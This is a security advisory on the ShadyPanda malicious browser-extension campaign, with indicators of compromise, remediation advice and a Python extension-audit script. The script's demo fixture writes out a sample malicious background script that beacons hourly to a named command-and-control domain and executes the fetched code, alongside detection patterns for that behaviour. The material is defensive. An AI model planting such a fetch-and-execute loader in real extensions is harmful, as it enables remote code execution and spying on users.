ShadyPanda’s 7-Year Malware Campaign Infected 4.3 Million Chrome and Edge users


ShadyPanda is a highly persistent browser-based threat actor responsible for a 7-year malware campaign that infected over 4.3 million users of Google Chrome and Microsoft Edge. This adversary weaponized browser extensions that initially operated as legitimate utilities, later turning them into powerful spyware and remote access tools. The campaign showcases how deeply a trusted extension can embed itself in user environments before activating malicious behavior.

Severity: High

Threat Details

  1. Threat Actor: ShadyPanda – named by KOI Research – origin unknown, but its infrastructure is hosted largely in China.
  2. Campaign Scale: Over 4.3 million users infected via 10+ browser extensions across multiple marketplaces since 2018.
  3. Capabilities of the Malware:
    • Remote Code Execution: Extensions beacon hourly to api.extensionplay[.]com, then download and execute whatever script the server returns, so the operator can change behaviour at will without publishing a new extension version.
    • Browser Surveillance: Logs full browsing history, search behaviour, scrolls, clicks and cookies.
    • Anti-analysis Features: Detects open developer tools and falls back to benign behaviour when it believes it is running in an analysis sandbox, so a short dynamic-analysis run sees nothing malicious.
    • MITM Capabilities: The extension service worker intercepts and modifies page traffic inside the browser, after TLS termination, so HTTPS offers no protection against the credential theft and content injection it performs.
    • Data Exfiltration: Collected data is AES-encrypted before being sent to domains such as cleanmasters[.]store, so inspecting the outbound traffic in plain text will not reveal what was taken.
  4. Campaign Evolution Timeline
    • Phase 1: Affiliate Fraud via Wallpaper Extensions (2023)
      • 145 extensions used to hijack affiliate traffic (Amazon, eBay, Booking.com)
      • Injected tracking codes and harvested browsing data for monetization
    • Phase 2: Search Hijacking (Early 2024)
      • Extensions redirected search queries to trovi[.]com
      • Search queries captured keystroke by keystroke from input fields, before the user submits them
      • Cookie theft and user fingerprinting
    • Phase 3: Remote Code Execution Backdoor (Mid-2024)
      • Trusted extensions (e.g., Clean Master) turned malicious via auto-updates
      • RCE framework pushed to 300,000 users
      • Fully modular – enabled credential theft, surveillance, content injection
    • Phase 4: Spyware Empire (2023–Present)
      • 5 extensions from Starlab Technology infected over 4 million users
      • Still active in Edge Marketplace
      • WeTab is flagship spyware with:
        • Keystroke-level monitoring
        • Click tracking with pixel-level precision
        • Full browser fingerprinting
        • Data exfiltrated to 17 domains in China
  5. Current Status
    • Clean Master and related extensions from Phase 3 have been removed.
    • Phase 4 spyware extensions are still live in the Microsoft Edge store and actively collecting data.
    • The command-and-control infrastructure remains online and can push arbitrary code to any still-installed extension, so ransomware delivery, supply chain attacks or credential harvesting could follow at any time.

Recommendations

  1. Immediately review all installed browser extensions in both Chrome and Edge. Uninstall any that are no longer essential, especially:
    • Extensions from the publisher Starlab Technology.
    • Any extension named Clean Master or WeTab 新标签页 (WeTab New Tab Page).
    • Any extension whose permissions are excessive for its advertised function (e.g., a simple wallpaper tool that requests access to all websites or to browsing history).
    In managed environments, enforce this with the browser's ExtensionInstallBlocklist / ExtensionInstallAllowlist policies rather than relying on users to act.
  2. If you used any of the compromised extensions (like Clean Master), treat the browser profile as compromised.
    • Change passwords for critical accounts (email, banking, corporate access) from a clean browser or device, and sign out of all active sessions for those accounts: the RCE backdoor could have captured credentials or session cookies, and a stolen cookie stays valid until the session is revoked server-side.
    • Clear all browsing history, cookies and cache for the infected browser. This removes local data the extension could still read; it does not invalidate copies already exfiltrated, which is why the session revocation above is required.
  3. Ensure your browser's security settings (e.g., Google Chrome's Enhanced Protection) are enabled. This provides real-time warnings against newly dangerous sites, downloads and extensions.
  4. Block the indicators of compromise at the appropriate controls (DNS, web proxy, firewall, EDR). The full IOC list is available at:
    https://www.virustotal.com/gui/collection/d79f04982129aff7331e4e12a87b87635ffc859c4df39af962ea4c7f76cab62f/iocs
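The extension review in recommendation 1 and the capability list in the Threat Details (hourly beacon, fetch-and-execute loader, broad host access, cookie and web-request permissions, known domains) can be turned into a quick local audit. The script below is an added example written for this advisory, not code from Ampcus Cyber or from the researchers who named ShadyPanda. It walks a browser's Extensions directory (Chrome and Edge use the same Extensions/<id>/<version>/manifest.json layout), parses each manifest, and flags suspect names, broad host access, sensitive permissions, scripts that fetch remote content and pass it to eval or new Function, periodic alarms, and the three domains named above. The two sample extensions it builds in a temporary directory are constructed for the demo; the scoring rules and finding labels are this example's own.

```python
"""Audit installed Chrome/Edge extensions for ShadyPanda-style indicators.

Added example for the advisory; not the advisory's or the researchers' code.
Names and domains below come from the advisory; everything else is constructed.
"""
import json
import os
import re
import sys
import tempfile
from pathlib import Path

SUSPECT_NAMES = ("clean master", "wetab", "新标签页", "starlab")          # from the advisory
SUSPECT_DOMAINS = ("extensionplay.com", "cleanmasters.store", "trovi.com")  # from the advisory
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
SENSITIVE_PERMS = {"history", "cookies", "webRequest", "webRequestBlocking",
                   "declarativeNetRequest", "tabs", "scripting"}

# Remote-code-loading pattern: a network fetch somewhere plus dynamic code execution.
RE_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|\bimportScripts\s*\(")
RE_REMOTE = re.compile(r"\bfetch\s*\(|XMLHttpRequest")
RE_ALARM = re.compile(r"\balarms\.create\s*\(")          # periodic beacon scheduling
RE_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def default_roots():
    """Default Extensions directories for Chrome and Edge on the current platform."""
    home = Path.home()
    if sys.platform.startswith("win"):
        base = Path(os.environ.get("LOCALAPPDATA", home / "AppData" / "Local"))
        return [base / "Google/Chrome/User Data/Default/Extensions",
                base / "Microsoft/Edge/User Data/Default/Extensions"]
    if sys.platform == "darwin":
        base = home / "Library/Application Support"
        return [base / "Google/Chrome/Default/Extensions", base / "Microsoft Edge/Default/Extensions"]
    return [home / ".config/google-chrome/Default/Extensions",
            home / ".config/microsoft-edge/Default/Extensions"]


def audit_extension(version_dir: Path) -> dict:
    """Inspect one unpacked extension version directory and return its findings."""
    manifest = json.loads((version_dir / "manifest.json").read_text(encoding="utf-8-sig"))
    name = str(manifest.get("name", ""))
    if name.startswith("__MSG_") and name.endswith("__"):   # localized name, resolve it
        loc = version_dir / "_locales" / str(manifest.get("default_locale", "en")) / "messages.json"
        if loc.is_file():
            name = json.loads(loc.read_text(encoding="utf-8-sig")).get(name[6:-2], {}).get("message", name)
    findings = []
    if any(s in name.lower() for s in SUSPECT_NAMES):
        findings.append("suspect-name")
    # MV2 keeps host patterns in "permissions"; MV3 moves them to "host_permissions".
    perms = set(map(str, manifest.get("permissions", []))) | set(map(str, manifest.get("host_permissions", [])))
    for cs in manifest.get("content_scripts", []):
        perms |= set(map(str, cs.get("matches", [])))
    if perms & BROAD_HOSTS:
        findings.append("broad-host-access")
    findings += sorted("sensitive-permission:" + p for p in perms & SENSITIVE_PERMS)
    remote = execs = alarm = False
    seen_domains = set()
    for js in version_dir.rglob("*.js"):
        src = js.read_text(encoding="utf-8", errors="ignore")
        remote |= bool(RE_REMOTE.search(src))
        execs |= bool(RE_EXEC.search(src))
        alarm |= bool(RE_ALARM.search(src))
        seen_domains |= {h.lower() for h in RE_HOST.findall(src)}
    if remote and execs:
        findings.append("remote-code-exec")
    if alarm:
        findings.append("periodic-alarm")
    findings += sorted("known-domain:" + d for d in seen_domains
                       if any(d == s or d.endswith("." + s) for s in SUSPECT_DOMAINS))
    return {"id": version_dir.parent.name, "version": version_dir.name, "name": name, "findings": findings}


def audit_root(root: Path) -> list:
    """Audit every <id>/<version> directory under an Extensions root."""
    return [audit_extension(m.parent) for m in sorted(root.glob("*/*/manifest.json"))]


def build_sample_tree(base: Path) -> Path:
    """Constructed sample: a benign wallpaper extension and one modelled on the advisory."""
    root = base / "Extensions"
    benign = root / "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" / "1.0.0_0"
    benign.mkdir(parents=True)
    (benign / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Daily Wallpaper", "version": "1.0.0",
        "permissions": ["storage"], "background": {"service_worker": "bg.js"}}))
    (benign / "bg.js").write_text("chrome.storage.local.set({theme: 'blue'});")
    bad = root / "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb" / "2.3.1_0"
    bad.mkdir(parents=True)
    (bad / "manifest.json").write_text(json.dumps({
        "manifest_version": 3, "name": "Clean Master", "version": "2.3.1",
        "permissions": ["cookies", "webRequest", "alarms", "tabs"],
        "host_permissions": ["<all_urls>"], "background": {"service_worker": "bg.js"}}))
    (bad / "bg.js").write_text(            # hourly beacon that executes whatever the server returns
        "chrome.alarms.create('p', {periodInMinutes: 60});\n"
        "chrome.alarms.onAlarm.addListener(async () => {\n"
        "  const r = await fetch('https://api.extensionplay.com/c');\n"
        "  new Function(await r.text())();\n"
        "});\n")
    return root


def run_demo() -> list:
    """Audit the constructed sample tree (used when no browser profile is found)."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_root(build_sample_tree(Path(tmp)))


def report(results):
    for r in results:
        flag = "SUSPECT" if r["findings"] else "ok"
        print(f"{flag:7} {r['id']} {r['name']!r} v{r['version']}: {', '.join(r['findings']) or '-'}")


if __name__ == "__main__":
    roots = [Path(a) for a in sys.argv[1:]] or [r for r in default_roots() if r.is_dir()]
    if roots:
        for root in roots:
            report(audit_root(root))
    else:
        report(run_demo())
```

Run it with no arguments to scan the default Chrome and Edge profiles, or pass one or more Extensions directories (other profiles, or a copy taken from a suspect host) as arguments. A hit on remote-code-exec or known-domain is a strong indicator; broad-host-access and sensitive-permission hits are common in legitimate extensions and should be weighed against what the extension claims to do, as recommendation 1 describes.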

Source:


Ampcus Cyber